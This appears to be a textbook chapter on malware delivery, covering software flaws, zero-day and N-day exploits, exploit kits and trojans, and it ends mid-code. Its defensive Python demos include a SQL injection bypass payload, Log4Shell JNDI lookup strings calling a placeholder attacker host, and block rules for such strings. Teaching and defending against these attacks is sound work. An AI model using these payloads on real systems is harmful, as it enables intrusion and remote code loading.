Part 1: Introduction to Malware and Taxonomy

Part 2: Malware Architecture and Components

Part 3: Delivery and Initial Compromise

Part 4: Social Engineering Attacks

Part 5: Specialized Malware Components

Part 6: Defenses Against Malware

The Challenge of Getting In

Attackers can create sophisticated malware with advanced capabilities, but all that is worthless if they can't get it onto target systems. Modern computers have substantial defenses at the perimeter. Firewalls block unsolicited incoming connections. Email systems filter suspicious attachments. Web browsers warn about potentially dangerous downloads. Operating systems require user permission before installing software. Antivirus software scans files before they execute.

Despite these defenses, attackers succeed constantly. They do so by finding creative ways around the barriers: exploiting technical vulnerabilities that bypass security controls, manipulating human psychology to get users to help them, compromising the software supply chain so malware arrives through trusted channels, or using physical access to circumvent network defenses entirely.

Understanding delivery mechanisms is important because this is where many attacks can be stopped. Once malware is executing on a system, detection and removal become much harder. But during delivery, there are opportunities to intercept the attack before any damage occurs.

Vulnerabilities: The Foundation of Technical Exploitation

At the core of many technical delivery methods lies the concept of a vulnerability: a flaw in software that can be exploited to cause it to behave in unintended ways. Vulnerabilities arise from programming errors, design flaws, or unexpected interactions between components.

Common types of vulnerabilities include:

Buffer overflows occur when a program writes data beyond the boundaries of allocated memory. If an attacker can control what data gets written and where, they might overwrite program code or control structures, ultimately causing the program to execute attacker-supplied code. The Morris Worm (1988) used a buffer overflow in the fingerd server. fingerd read its input with the gets() function, which does not check length, so the attacker could send more data than the buffer could hold, inject code, and overwrite the return address on the stack.
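Python cannot actually write past the end of a buffer, so the sketch below is a toy model rather than a working exploit. A `bytearray` stands in for a stack frame that holds a 16-byte buffer followed by an 8-byte saved return address. The sizes, the layout, and both addresses are hypothetical simplifications; real frame layouts depend on the compiler and architecture. `unchecked_copy` mimics gets() by copying all input regardless of length, and `bounded_copy` mimics a length-checked read such as fgets().

```python
# Toy model only: a bytearray stands in for one stack frame.
BUF_SIZE = 16   # hypothetical size of the local input buffer
RET_SIZE = 8    # hypothetical size of the saved return address

def make_frame(return_address: int) -> bytearray:
    """Layout: [ buffer (BUF_SIZE bytes) ][ saved return address (RET_SIZE bytes) ]"""
    frame = bytearray(BUF_SIZE + RET_SIZE)
    frame[BUF_SIZE:] = return_address.to_bytes(RET_SIZE, "little")
    return frame

def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Mimics gets(): copies every input byte without checking the buffer size.
    (In this model, bytes beyond the end of the frame are simply discarded.)"""
    for i, byte in enumerate(data):
        if i < len(frame):
            frame[i] = byte

def bounded_copy(frame: bytearray, data: bytes) -> None:
    """Mimics a length-checked read such as fgets(): never writes past BUF_SIZE."""
    n = min(len(data), BUF_SIZE)
    frame[:n] = data[:n]

def saved_return_address(frame: bytearray) -> int:
    return int.from_bytes(frame[BUF_SIZE:], "little")

LEGIT_RETURN = 0x401000        # hypothetical address of the calling code
ATTACKER_TARGET = 0xDEADBEEF   # hypothetical address chosen by the attacker
payload = b"A" * BUF_SIZE + ATTACKER_TARGET.to_bytes(RET_SIZE, "little")

frame = make_frame(LEGIT_RETURN)
unchecked_copy(frame, payload)
print(hex(saved_return_address(frame)))   # 0xdeadbeef: control data overwritten

frame = make_frame(LEGIT_RETURN)
bounded_copy(frame, payload)
print(hex(saved_return_address(frame)))   # 0x401000: return address intact
```

The two copy routines differ only in the length check, and that check is exactly what gets() omits.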

SQL injection vulnerabilities occur when user-supplied input is incorporated into database queries without proper validation or parameterization. An attacker can manipulate the query's structure to read or modify unauthorized data, bypass authentication, or, on some database configurations, execute operating system commands on the database server.
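Here is a minimal sketch of the authentication-bypass case. It uses Python's built-in `sqlite3` module with an in-memory database. The `users` table, its plaintext password column, and both login functions are hypothetical and deliberately simplified. The first function builds the query by string formatting. The second passes the input as bound parameters, which is the standard fix.

```python
import sqlite3

# Hypothetical schema; storing plaintext passwords is for brevity only
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def login_vulnerable(name: str, password: str) -> bool:
    # UNSAFE: user input is pasted directly into the SQL text
    query = f"SELECT COUNT(*) FROM users WHERE name = '{name}' AND password = '{password}'"
    return conn.execute(query).fetchone()[0] > 0

def login_safe(name: str, password: str) -> bool:
    # Parameterized query: input is passed as data, never parsed as SQL syntax
    query = "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchone()[0] > 0

attack = "' OR '1'='1"
print(login_vulnerable("alice", attack))  # True: authentication bypassed
print(login_safe("alice", attack))        # False: treated as a literal (wrong) password
```

With the injected input, the vulnerable query's `WHERE` clause becomes `name = 'alice' AND password = '' OR '1'='1'`. Because `AND` binds more tightly than `OR`, the condition is true for every row.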

Cross-site scripting (XSS) vulnerabilities in web applications allow attackers to inject malicious scripts into web pages viewed by other users. These scripts execute in victims' browsers with the full privileges of the vulnerable website. We will cover this attack when we explore web security.

Privilege escalation vulnerabilities allow attackers to gain higher permissions than they should have. A standard user account might exploit a vulnerability to gain administrator privileges (root on Linux or SYSTEM on Windows).

Logic errors occur when software doesn't properly validate assumptions or handle edge cases. These can be exploited to bypass security checks or cause unintended behavior.

Vulnerabilities follow a lifecycle:

- The vulnerability exists in software, often for years, completely unknown
- Someone discovers it: might be a security researcher, the software vendor themselves, or an attacker
- If the vendor learns about it, they develop and release a patch
- Users apply the patch (hopefully)
- The vulnerability is no longer exploitable on patched systems

The gap between discovery and patching is critical. During this window, systems are vulnerable. But even after patches are available, many systems remain unpatched indefinitely. Organizations delay patching for fear of breaking critical systems. Home users ignore update notifications. Legacy systems can't be updated because they're no longer supported. This is why exploits for old vulnerabilities remain effective years after patches are available.

Internet-of-Things (IoT) devices, such as network-connected cameras, home control devices, printers, refrigerators, and copiers, are particularly vulnerable since they often don't get updates or are used long after the manufacturer stops issuing them.

Zero-Day Vulnerabilities and Exploits

The most dangerous vulnerabilities are zero-days: those unknown to the software vendor. The name comes from the fact that vendors have had zero days to fix the problem. When an attacker discovers a zero-day, they have a powerful advantage.

Why are zero-days so dangerous?

No patch exists. Defenders can't fix what they don't know about. Even the most diligent system administrators who apply every available security update remain vulnerable.

No signatures exist. Antivirus and intrusion detection systems rely on recognizing byte sequences (called a "signature" -- no relation to digital signatures) of known attacks. A zero-day exploit looks nothing like any previously seen attack, so signature-based defenses can't detect it.
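In its simplest form, signature matching is a search for known byte sequences inside a file. The sketch below uses a hypothetical two-entry signature database and made-up file contents. Real engines add hashes, wildcard patterns, and heuristics, but they share the core limitation: a payload that contains none of the stored sequences produces no match.

```python
# Hypothetical signature database: detection name -> byte sequence from a known sample
SIGNATURES = {
    "Example.KnownDropper": bytes.fromhex("deadbeef0badf00d"),
    "Example.OldWorm": b"spread_to_next_host",
}

def scan(data: bytes) -> list[str]:
    """Return the names of all signatures whose bytes appear anywhere in data."""
    return [name for name, signature in SIGNATURES.items() if signature in data]

# Hypothetical file contents
known_sample = b"MZ\x90\x00" + bytes.fromhex("deadbeef0badf00d") + b"\x00rest of file"
novel_sample = b"MZ\x90\x00" + b"never-before-seen exploit code"

print(scan(known_sample))   # ['Example.KnownDropper']
print(scan(novel_sample))   # []: no stored signature matches
```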

Defense is reactive. Organizations can only defend against zero-days through generic security measures like restricting permissions, network segmentation, and monitoring for anomalous behavior. These help, but aren't foolproof.

Very valuable. Zero-day vulnerabilities and exploits command high prices. Markets exist where:

- Legitimate security researchers sell zero-days to vendors through bug bounty programs ($1,000-$50,000+ depending on severity)
- Researchers sell to government agencies for intelligence and military purposes ($100,000-$2,000,000+)
- Criminal markets trade zero-days for exploitation ($100,000-$1,000,000+)

The price varies based on several factors: which software is affected (vulnerabilities in widely-used software like Windows or iOS are worth more), what the exploit enables (remote code execution is worth more than information disclosure), and how reliable the exploit is (exploits that work 100% of the time are worth more than those that might crash the target).

A couple of particularly well-known zero-day exploits include:

EternalBlue was a zero-day exploit developed by the NSA that targeted the Windows SMB protocol. It was leaked by a group called The Shadow Brokers in April 2017. Microsoft had released a patch (MS17-010) in March 2017—unusually, they patched before the public disclosure, suggesting they had learned about it through other channels. Despite the available patch, WannaCry successfully exploited EternalBlue on hundreds of thousands of systems just weeks later because many systems remained unpatched.

Stuxnet (2010) used four zero-day exploits simultaneously, an unprecedented number. This sophisticated worm targeted Iranian nuclear facilities and demonstrated nation-state level capabilities in malware development. The zero-days targeted Windows vulnerabilities, while the worm's payload targeted Siemens industrial control systems.

Recent examples continue to emerge regularly. In October 2025 (when I'm writing this), Microsoft patched two zero-day vulnerabilities affecting Windows that were actively exploited: one had been known to attackers since 2017. Another zero-day in Chrome (CVE-2025-2783) was exploited in a sophisticated cyberespionage campaign. A vulnerability in Lanscope (CVE-2025-61932) with a CVSS score of 9.3 allowed remote command execution with SYSTEM privileges and was actively exploited to install backdoors.

These examples illustrate an important point: zero-day doesn't mean brand new. Some zero-days are exploited for years before being discovered and patched. During that entire time, defenders have no idea they're vulnerable.

N-Day Exploits: The Patching Window

While zero-days represent unknown vulnerabilities, N-day exploits (also called 1-day exploits) target known vulnerabilities: those that have been publicly disclosed and for which patches typically exist. The "N" represents the number of days since the vulnerability became public knowledge.

The transition from zero-day to N-day is a critical moment in the vulnerability lifecycle. When a vendor releases a security patch, they typically also publish information about the vulnerability it fixes. This disclosure is necessary: users need to understand the severity and priority of updates. However, it also creates a new threat.

Patch Diffing and Exploit Development

Security researchers and attackers alike can perform patch diffing: comparing the patched version of software to the previous vulnerable version to identify exactly what changed. Modern tools automate much of this process. By examining the differences, they can determine:

- Which code was modified
- What type of vulnerability was fixed (buffer overflow, integer overflow, logic error, etc.)
- How the vulnerability could be triggered
- What the exploitable conditions are

With this information, someone who didn't previously know about the vulnerability can now develop an exploit. The patch essentially provides a roadmap to the vulnerability.
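Real patch diffing usually compares compiled binaries with dedicated tools. The idea can still be sketched at the source level with Python's standard `difflib` module. The C function below and the `NAME_MAX_LEN` constant are hypothetical. The point is that the lines added by the patch lead straight to the flaw.

```python
import difflib

# Hypothetical C function before the security patch
vulnerable = """\
int copy_name(char *dst, const char *src, size_t len) {
    memcpy(dst, src, len);
    return 0;
}
""".splitlines(keepends=True)

# Hypothetical patched version: the vendor added a length check
patched = """\
int copy_name(char *dst, const char *src, size_t len) {
    if (len > NAME_MAX_LEN)
        return -1;
    memcpy(dst, src, len);
    return 0;
}
""".splitlines(keepends=True)

diff = list(difflib.unified_diff(vulnerable, patched, fromfile="before.c", tofile="after.c"))
print("".join(diff))

# Lines the patch added (skipping the "+++" file header) reveal what was missing
added = [line[1:].strip() for line in diff if line.startswith("+") and not line.startswith("+++")]
print(added)   # ['if (len > NAME_MAX_LEN)', 'return -1;']
```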

This creates a dangerous window. Consider the timeline:

- Day 0: Vendor releases a patch and security advisory
- Hours later: Researchers and attackers begin patch diffing
- Days 1-3: Proof-of-concept exploits start appearing
- Days 3-7: Weaponized exploits become available
- Weeks to months: Many systems remain unpatched

The attacker pool expands dramatically. Before the patch, only the original discoverer(s) and perhaps a few others knew about the vulnerability. After the patch, anyone with reverse-engineering skills can develop an exploit. What was once a carefully guarded secret becomes publicly reproducible knowledge.

Why Systems Remain Vulnerable

Despite patches being available, systems often remain vulnerable to N-day exploits for extended periods:

Patching takes time. Organizations can't immediately deploy every patch. They must test patches to ensure they don't break critical systems or cause compatibility issues. This testing period -- which might be days, weeks, or even months for critical systems -- leaves systems vulnerable.

Update fatigue. Users receive constant update notifications and may ignore or delay them. "Remind me tomorrow" becomes "remind me next week," which becomes "I'll do it eventually."

Compatibility concerns. Some patches break existing functionality. Organizations may delay patching systems that run critical applications until they can verify compatibility or find workarounds.

Legacy systems. Older systems may no longer receive vendor patches. Windows XP, Windows 7, and various legacy applications continue running without security updates.

Complex dependencies. Patching one component might require updating others. A security update might require first updating the framework, which requires updating the operating system, which requires purchasing new hardware because the old system doesn't support the new OS.

Lack of awareness. Many organizations don't have good asset inventories. They don't know all the software running in their environment, so they can't systematically patch everything.

Operational constraints. Some systems cannot be taken offline for patching. Manufacturing equipment, medical devices, and other operational technology often run continuously, with patching windows measured in months or years.

The Attacker's Perspective

From an attacker's perspective, N-day exploits offer several advantages over zero-days:

Cost. Zero-day exploits cost anywhere from tens of thousands to millions of dollars. N-day exploits can be developed from publicly available patches or found in exploit databases for free.

Availability. Zero-days are rare and carefully hoarded. N-days are abundant—dozens of exploitable vulnerabilities are disclosed every month across various software platforms.

Lower risk. Using a zero-day on a low-value target "burns" a valuable resource. Once used, it will eventually be discovered, analyzed, and patched. N-days are already public, so there's no loss in using them.

Adequate effectiveness. For most targets, N-day exploits work perfectly fine because most systems aren't fully patched. Attackers only need zero-days for the most hardened targets or when stealth is absolutely critical.

Statistics support this approach. Studies have found that:

- Median time to patch critical vulnerabilities ranges from 30-100 days across different organizations
- Some organizations take 6 months or more to patch critical vulnerabilities
- Approximately 20% of disclosed vulnerabilities never get patched on many systems

This means attackers have months or even years to exploit N-day vulnerabilities against substantial portions of the internet.

Examples of N-Day Exploitation

EternalBlue, mentioned earlier as a famous zero-day, is also the classic N-day example. It began as a zero-day exploited by the NSA. When The Shadow Brokers leaked it in April 2017, Microsoft had already released a patch in March 2017 (suggesting Microsoft learned about it through other means before the public leak).

Despite the patch being available, WannaCry successfully used EternalBlue to infect over 200,000 computers in May 2017 -- two months after the patch was released. Even years later, internet scans still find thousands of systems with port 445 exposed and vulnerable to EternalBlue. What was once a jealously guarded NSA zero-day became a widely exploited N-day that remains effective years after patching.

Log4Shell (CVE-2021-44228), a critical vulnerability in the Log4j logging library, shows how quickly N-day exploitation scales. The vulnerability was disclosed in December 2021. Within hours, automated exploitation attempts were detected worldwide. Within days, security firms had recorded hundreds of thousands of exploitation attempts. Months and years later, vulnerable Log4j instances still exist on internet-facing systems.

The vulnerability was simple to exploit: attackers could trigger it by including a specific string in any logged data. The patch was straightforward: simply update to a newer version of Log4j. Yet the deployment challenge was enormous because Log4j is embedded in countless applications, many of which don't explicitly declare the dependency. Organizations struggled to even identify all affected systems, let alone patch them.
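The "specific string" was a JNDI lookup such as `${jndi:ldap://attacker.example/a}`. Vulnerable Log4j versions would resolve this lookup, contacting the attacker's server. Attackers soon started hiding the word `jndi` behind nested lookups like `${lower:j}` or `${::-j}`. The sketch below is a hypothetical and deliberately incomplete log-scanning heuristic: it collapses a few such nested lookups and then searches for `${jndi:`. Real attack strings used many more variants, so treat this as an illustration of the idea rather than a reliable detector. `attacker.example` is a placeholder domain.

```python
import re

# A few obfuscating nested lookups, e.g. ${lower:j} or ${::-j}. Illustrative, not exhaustive.
NESTED_LOOKUP = re.compile(r"\$\{(?:lower:|upper:|::-)([^${}]*)\}", re.IGNORECASE)
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)

def normalize(line: str) -> str:
    """Repeatedly replace simple nested lookups with their literal value."""
    while True:
        collapsed = NESTED_LOOKUP.sub(lambda m: m.group(1), line)
        if collapsed == line:
            return line
        line = collapsed

def looks_like_log4shell(line: str) -> bool:
    return bool(JNDI_LOOKUP.search(normalize(line)))

samples = [
    'GET /index.html "Mozilla/5.0"',
    'GET / "${jndi:ldap://attacker.example/a}"',
    'GET / "${${lower:j}ndi:ldap://attacker.example/a}"',
    'GET / "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}"',
]
for s in samples:
    print(looks_like_log4shell(s), s)   # False for the first line, True for the other three
```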

The Patch Tuesday Arms Race

Microsoft's Patch Tuesday (the second Tuesday of each month when Microsoft releases security updates) has become a predictable cycle that both defenders and attackers watch closely.

- Defenders: Download and test patches → Plan deployment → Execute patching → Verify success
- Attackers: Download patches → Diff against previous version → Develop exploits → Begin exploitation

The race is on. Who will finish first: defenders patching their systems or attackers developing and deploying exploits?

Evidence suggests attackers often win this race. "Exploit Wednesday" has become a darkly humorous term for the day after Patch Tuesday, when proof-of-concept exploits start appearing. By the weekend, weaponized exploits may already be integrated into exploit kits and used in active attacks.
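Patch Tuesday follows a fixed calendar rule, so both sides can compute it in advance. Here is a small sketch using Python's standard `datetime` and `calendar` modules; the function names are illustrative.

```python
import calendar
import datetime

def patch_tuesday(year: int, month: int) -> datetime.date:
    """Return the second Tuesday of the given month."""
    first_of_month = datetime.date(year, month, 1)
    # weekday(): Monday == 0, Tuesday == 1, ...; number of days until the first Tuesday
    days_to_first_tuesday = (calendar.TUESDAY - first_of_month.weekday()) % 7
    return first_of_month + datetime.timedelta(days=days_to_first_tuesday + 7)

def exploit_wednesday(year: int, month: int) -> datetime.date:
    """The day after Patch Tuesday."""
    return patch_tuesday(year, month) + datetime.timedelta(days=1)

print(patch_tuesday(2025, 10))       # 2025-10-14
print(exploit_wednesday(2025, 10))   # 2025-10-15
```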

This dynamic has led to interesting strategic considerations:

Staggered patching (rolling patches out in stages) reflects a trade-off. Organizations that patch quickly (within days) face the lowest risk from N-day exploits but potentially higher risk from bugs in the patches themselves. Organizations that patch slowly (after weeks or months) face a higher risk from N-day exploits but a lower risk from patch-related bugs.

Emergency patching for critical vulnerabilities tries to compress the window. When a severe vulnerability is disclosed, organizations may patch immediately despite normal testing procedures. However, this rush can cause outages or break systems, which is why many organizations remain reluctant to emergency patch unless actively under attack.

Virtual patching uses security appliances to block exploit attempts without actually patching the vulnerable software. Web application firewalls, intrusion prevention systems, and similar tools can filter malicious traffic targeting known vulnerabilities. This provides protection while the actual patching process proceeds through normal channels.
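Virtual patching can be sketched as a filter placed in front of an application whose code is left unmodified. The example below assumes a Python WSGI application. The middleware, the stand-in `vulnerable_app`, and the two regex rules (a Log4Shell-style `${jndi:` lookup and a `../` path-traversal pattern) are all hypothetical. Production WAF and IPS products also inspect request bodies, decode encodings, and use far richer rule sets.

```python
import re

# Hypothetical virtual-patch rules, matched against the request path and header values
BLOCK_RULES = [
    re.compile(r"\$\{jndi:", re.IGNORECASE),  # Log4Shell-style lookup string
    re.compile(r"\.\./"),                     # path traversal attempt
]

def virtual_patch(app):
    """Wrap a WSGI app so matching requests are rejected before the app sees them.
    The wrapped application's own code is not modified."""
    def middleware(environ, start_response):
        fields = [environ.get("PATH_INFO", "")]
        fields += [str(v) for k, v in environ.items() if k.startswith("HTTP_")]
        if any(rule.search(field) for rule in BLOCK_RULES for field in fields):
            start_response("403 Forbidden", [("Content-Type", "text/plain")])
            return [b"Request blocked by virtual patch\n"]
        return app(environ, start_response)
    return middleware

def vulnerable_app(environ, start_response):
    """Stand-in for legacy software that cannot be patched yet."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"Hello\n"]

protected_app = virtual_patch(vulnerable_app)

# Simulated requests (a real deployment would run protected_app under a WSGI server)
statuses = []
def record_status(status, headers):
    statuses.append(status)

protected_app({"PATH_INFO": "/", "HTTP_USER_AGENT": "${jndi:ldap://attacker.example/a}"}, record_status)
protected_app({"PATH_INFO": "/../../etc/passwd"}, record_status)
protected_app({"PATH_INFO": "/", "HTTP_USER_AGENT": "Mozilla/5.0"}, record_status)
print(statuses)   # ['403 Forbidden', '403 Forbidden', '200 OK']
```

The rules live outside the application, so they can be deployed or withdrawn quickly while the real patch goes through normal testing.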

The N-day problem highlights a fundamental challenge in security: perfect defense requires perfect, immediate patching across all systems, something that's practically impossible in complex, real-world environments. Attackers exploit this gap between disclosure and deployment, making N-day vulnerabilities nearly as valuable as zero-days for all but the most security-conscious targets.

Zero-Click Exploits

Among the most sophisticated and dangerous exploits are zero-click attacks -- exploits that require absolutely no user interaction. The victim doesn't need to click a link, open a file, or perform any action. Simply having a vulnerable system reachable by the attacker is sufficient.

iMessage exploits on iOS have been particularly notorious. Just receiving a malicious iMessage can compromise an iPhone without the user doing anything: they don't need to open the message or tap any link. NSO Group's Pegasus spyware used such exploits to target journalists, activists, and political figures worldwide. The victim would receive a message, and before they even saw it, their phone was compromised. These exploits are so valuable that they sell for millions of dollars on the gray market.

WhatsApp call exploit (2019) allowed attackers to compromise devices through a missed call. The victim didn't need to answer the call: just receiving the call attempt was enough to trigger the vulnerability and install spyware. The vulnerable code shipped in the app used by WhatsApp's roughly 1.5 billion users. The attack demonstrated that zero-click attacks aren't limited to SMS or Apple's iMessage.

SMB exploits like EternalBlue technically qualify as zero-click. A Windows system with TCP port 445 (used by SMB file sharing) exposed to the network could be compromised by an attacker simply sending specially crafted packets. No user interaction was required—the system just needed to be on the network and reachable by the attacker.

More recent examples continue to emerge:

In March 2025, WhatsApp patched a zero-click vulnerability exploited in Paragon spyware attacks. Attackers added targets to a WhatsApp group and sent a PDF. The victim's device automatically processed the PDF in the background, exploiting the vulnerability to load the Graphite spyware implant without any user interaction.

In November 2024, a vulnerability in a photo management app that comes pre-installed and enabled on Synology's BeeStation storage devices could be exploited remotely to steal data. The vulnerability was categorized as "critical" and required no user action: just having the device on the network was sufficient.

Zero-click exploits represent the holy grail for attackers because:

No social engineering required. The attack doesn't depend on tricking users or waiting for them to make a mistake. Even security-aware, well-trained users are vulnerable.

Works against careful users. Someone who never clicks suspicious links, never opens unexpected attachments, and follows all security best practices is still vulnerable to zero-click exploits.

Difficult to detect. There's often no suspicious user behavior to notice -- no warning signs that might alert the victim.

Extremely valuable. Because of these properties, zero-click exploits command the highest prices in both legitimate bug bounty programs and gray markets. Prices in the millions of dollars are not unusual.

However, zero-click exploits also have limitations from the attacker's perspective. They're expensive to develop or acquire. They're complex to implement and may be unreliable.

Once used, they risk discovery: security researchers analyze suspicious activity and may find the exploit, leading to patches. This is why zero-click exploits are typically reserved for high-value targets: nation-states targeting intelligence collection, sophisticated criminal groups targeting wealthy individuals or critical infrastructure, or law enforcement agencies with substantial budgets.

Exploit Kits: Automated Attack Platforms

While zero-days and sophisticated exploits require significant expertise, exploit kits democratize exploitation by automating the process. An exploit kit is essentially an automated system that tests visitors for various vulnerabilities and delivers appropriate exploits.

Here's how a typical exploit kit works:

- An attacker compromises a website or purchases advertising space on legitimate sites
- The compromised site or malicious ad loads JavaScript from the exploit kit
- When a user visits the page, the exploit kit's JavaScript runs in their browser
- The kit performs "fingerprinting": detecting which browser version, operating system, and plugins (Flash, Java, PDF reader, etc.) the visitor is using
- Based on this information, the kit selects appropriate exploits from its collection
- If the visitor is vulnerable to any of the available exploits, the kit delivers that exploit
- The exploit runs and downloads malware onto the victim's system
- The user may never notice anything happened: they just visited a website

This entire process happens in seconds while the page is loading.
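Leaving the exploits themselves aside, the fingerprint-and-select step comes down to comparing the reported software versions against a table of versions known to be vulnerable. The sketch below uses hypothetical product names and version numbers. Defenders run essentially the same comparison in patch-audit tools to find out-of-date software before an attacker does.

```python
# Hypothetical table: component -> first version that fixes a known vulnerability
FIXED_IN = {
    "ExampleBrowser": (118, 0, 2),
    "ExamplePDFPlugin": (11, 4),
}

def parse_version(text: str) -> tuple[int, ...]:
    return tuple(int(part) for part in text.split("."))

def vulnerable_components(fingerprint: dict[str, str]) -> list[str]:
    """Return the fingerprinted components that are older than their fixed version."""
    return [
        component
        for component, version in fingerprint.items()
        if component in FIXED_IN and parse_version(version) < FIXED_IN[component]
    ]

# Hypothetical fingerprint collected from one visitor
visitor = {"ExampleBrowser": "117.9.5", "ExamplePDFPlugin": "11.4.1", "OtherPlugin": "2.0"}
print(vulnerable_components(visitor))   # ['ExampleBrowser']
```

Python compares version tuples element by element, so `(11, 4, 1)` counts as newer than `(11, 4)`, and that plugin is treated as patched.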

Popular exploit kits from the past decade included:

Angler (2013-2016) was one of the most sophisticated exploit kits. It used advanced obfuscation techniques, had a high success rate, and was constantly updated with new exploits. At its peak, Angler was responsible for a significant percentage of exploit kit infections.

Nuclear and RIG were other widely-used kits. RIG remains active even today, though exploit kits have generally declined in popularity as browsers have become more secure.

Magnitude specialized in exploiting specific vulnerabilities and targeted particular regions or user demographics.

Exploit kits enable drive-by downloads—infections that occur when a user visits a website. The term "drive-by" comes from the analogy to drive-by shootings—you're hit just by being in the wrong place, without any direct interaction.

From an attacker's perspective, exploit kits have several advantages:

Automation: Once set up, the kit runs automatically without requiring attacker intervention. One compromised website can infect thousands of visitors.

Broad targeting: The kit tries multiple exploits, increasing the chance of successful infection. A visitor might be patched against one vulnerability but vulnerable to another.

Updates: Kit operators continuously add new exploits, often within days of vulnerabilities being publicly disclosed.

Renting model: Attackers don't need to develop their own exploits. They can rent access to exploit kits, paying either by infection or by time.

From a defender's perspective, exploit kits highlight the importance of:

Keeping software updated: Browser updates and plugin patches close the vulnerabilities that exploit kits target. The most effective defense is simply applying available updates.

Removing unnecessary plugins: Flash, Java, and Silverlight were popular targets for exploit kits. Modern browsers have deprecated or removed these plugins, significantly reducing the attack surface.

Using ad blockers: Since malicious advertising is a common delivery mechanism for exploit kits, ad blockers provide a layer of protection.

Script blocking: Browser extensions that block JavaScript by default prevent exploit kit code from running, though they also break many legitimate websites.

The decline of exploit kits in recent years (though they haven't disappeared entirely) reflects improved browser security. Modern browsers update automatically, have better sandboxing, and have removed vulnerable plugins. This has made exploit kits less effective, though they remain a threat, particularly against outdated systems.

Trojan Horses: Deception as Delivery

While exploits leverage technical vulnerabilities, trojans leverage human trust and desire. A trojan is malware disguised as legitimate, desirable software. It has two functions: one overt and the other covert. The overt (exposed) function is the one that the user thinks they're getting. The covert (hidden) function is the attacker's malware.

The name comes from the Greek myth of the Trojan Horse: a wooden horse that appeared to be a gift but concealed soldiers who attacked once inside the city walls.

The key characteristic of trojans is that users willingly install them. Unlike viruses (which attach to legitimate files) or worms (which spread automatically), trojans are standalone programs that deceive users about their true nature.

What Trojans Claim to Be

Trojans masquerade as various types of legitimate software:

System utilities like registry cleaners, PC optimizers, or driver updaters promise to speed up your computer or fix problems. These are appealing because many users experience slow computers and are looking for solutions.

Cracked software or keygens (key generators) offer free access to expensive commercial software. Users searching for pirated copies of Photoshop, Microsoft Office, or popular games often encounter trojans. The appeal of getting expensive software for free overrides caution.

Fake antivirus software claims to protect your computer. Ironically, these "antivirus" programs are themselves malware. They might display fake scan results showing infections and demand payment to "clean" the system.

Media codecs or players that claim to be necessary to view video content. "Download this codec to watch the video" is a classic trojan delivery method.

Document readers or productivity tools that seem useful but contain malicious functionality.

Utilities from untrusted sources like unofficial app stores, torrent sites, or software download portals filled with advertisements and "download" buttons that don't actually download the legitimate software.

What Trojans Actually Do

Once installed, trojans deliver various payloads:

Install backdoors that provide remote access to the system. These backdoors might be simple tools that give command-line access or sophisticated frameworks that provide full graphical control.

Deploy spyware and keyloggers to steal credentials, monitor activity, and exfiltrate data.

Download additional malware acting as a dropper. The initial trojan might be relatively simple, with its main purpose being to download and install more sophisticated malware once execution is achieved.

Steal information by searching for and exfiltrating documents, browser passwords, cryptocurrency wallets, or other valuable data.

Join botnets turning the infected system into a bot that can be commanded to send spam, participate in DDoS attacks, or mine cryptocurrency.

Install ransomware that encrypts files and demands payment.

The trojan itself may provide the functionality it claims: a "PDF reader" trojan might actually read PDFs while also installing a backdoor. This makes detection harder because the software appears to work as advertised.

Sidebar: The ComfyUI Trojan Incident

A 2024 incident involving Disney illustrates how trojans can affect even large organizations. Matthew Van Andel, a mid-level manager at Disney, downloaded a plug-in for ComfyUI, an AI image generation tool, from GitHub. The plug-in appeared legitimate and was functional: it did exactly what it claimed to do, making ComfyUI easier to use.

However, the software also contained malicious components. It gave attackers access to Van Andel's 1Password cache (where his password manager stored encrypted credentials) and other sensitive information on his computer. The attackers stole his identity and logged into his work Slack account, downloading company data. They then dumped all of Van Andel's login credentials and passwords online.

The consequences were severe: Van Andel was fired, his personal and professional accounts were compromised, and sensitive Disney information was exposed. The incident occurred even though Van Andel was following what seemed like a reasonable practice: downloading open-source software from GitHub, a trusted platform for developers.

This case demonstrates several important points about trojans:

- Legitimate functionality doesn't mean safe: The plug-in actually worked as advertised, but that didn't make it trustworthy.
- Trusted platforms aren't immune: GitHub is generally reputable, but anyone can upload code there. The presence of software on GitHub doesn't guarantee its safety.
- Supply chain considerations: Even developers downloading tools for legitimate work purposes are targets for trojan attacks.
- Password manager compromise: While password managers greatly improve security compared to remembering passwords or writing them down, they become high-value targets. If malware can access the cached, decrypted passwords in memory, it can steal all credentials at once.
- Organizational impact: One infected personal computer led to corporate account compromise and data theft, illustrating how personal device security affects organizational security, especially in remote work environments.

Why Trojans Work

Trojans succeed because they exploit human psychology:

Desire for free things: People want expensive software for free. Trojans offering cracked software or key generators are appealing despite the obvious risk.

Trust in appearance: Professional-looking websites, well-designed program interfaces, and legitimate-sounding names create trust. A trojan that looks polished seems more trustworthy than one that appears amateur.

Urgency and necessity: "You need this codec to view the content" or "Your system has problems that need fixing" creates pressure to act quickly without thinking carefully.

Social proof: Fake reviews, download counters, and testimonials make trojans appear legitimate and widely used.

Security fatigue: Users become accustomed to security warnings and start ignoring them. When every website and program triggers warnings, legitimate warnings blend into the background noise.

Defending against trojans requires different approaches than defending against exploits:

Only download software from official sources: Vendors' websites, official app stores, and verified repositories are much safer than random download sites.

Verify downloads: Check cryptographic signatures or checksums to ensure downloaded files haven't been modified.

Search for reviews and information: Before installing unfamiliar software, search for "{software name} malware" or "{software name} safe" to see if others have reported problems.

Be skeptical of free versions of paid software: If commercial software is offered for free from an unofficial source, it's likely either pirated or a trojan (or both).

Use caution with "system optimizers": Legitimate system maintenance is usually built into the operating system. Third-party optimizers are often unnecessary at best and malicious at worst.

Consider alternatives: Instead of downloading a questionable codec or plugin, look for alternative ways to achieve the goal—different websites, different tools, or different approaches.
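The "Verify downloads" advice can be sketched with Python's standard `hashlib`. The function names, and the idea that the vendor publishes a SHA-256 value, are assumptions for illustration. The check only helps if the published value comes from a trusted channel separate from the download itself, such as the vendor's official HTTPS site. An attacker who can replace a file on a mirror may also be able to replace a checksum hosted next to it.

```python
import hashlib
import tempfile
from pathlib import Path

def sha256_of(path: Path, chunk_size: int = 65536) -> str:
    """Hash the file in chunks so large installers need not fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
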